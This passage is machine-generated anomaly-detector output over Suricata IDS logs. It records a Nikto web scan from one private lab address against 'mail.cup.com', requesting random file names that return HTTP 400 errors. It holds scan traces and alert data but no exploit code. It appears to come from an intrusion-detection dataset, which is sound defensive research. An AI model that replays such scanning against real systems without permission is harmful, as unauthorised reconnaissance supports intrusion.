"/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46844, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.231549 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46844 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.23 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.list", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.231715+0000\",\"flow_id\":212665289573775,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46844,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.list\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.list\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.231715, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":212665289573775,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46844,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.list\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.list\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46844,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.list\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": 
"\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.list\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.list\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.list\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.list", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.list", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", 
"/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46844,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46844, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": 
"TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":212665289573775,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 212665289573775, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.231715+0000\",\"flow_id\":212665289573775,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46844,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.list\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.list\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.23 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.233219 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 
192.168.10.238:46846 -> 192.168.10.154:80", "/parser/model/time": 1583349514.233219, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46846, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.233219 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46846 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.23 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.EXE", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": 
"{\"timestamp\":\"2020-03-04T19:18:34.233382+0000\",\"flow_id\":1641910146599993,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46846,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.EXE\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.EXE\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.233382, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1641910146599993,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46846,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.EXE\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.EXE\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46846,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.EXE\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.EXE\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.EXE\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.EXE\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.EXE", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.EXE", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": 
"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46846,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", 
"/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46846, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1641910146599993,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1641910146599993, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.233382+0000\",\"flow_id\":1641910146599993,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46846,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.EXE\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.EXE\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.23 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" 
], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.235199 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46848 -> 192.168.10.154:80", "/parser/model/time": 1583349514.235199, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46848, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.235199 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46848 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.24 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ 
"\\/bISn4adA.java", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.235367+0000\",\"flow_id\":1729286961271675,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46848,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.java\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.java\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.235367, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1729286961271675,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46848,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.java\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.java\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46848,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": 
",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.java\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.java\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.java\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.java\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.java", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.java", 
"/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46848,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", 
"/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46848, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1729286961271675,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1729286961271675, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.235367+0000\",\"flow_id\":1729286961271675,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46848,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.java\",\"http_user_agent\":\"Mozilla\\/5.00 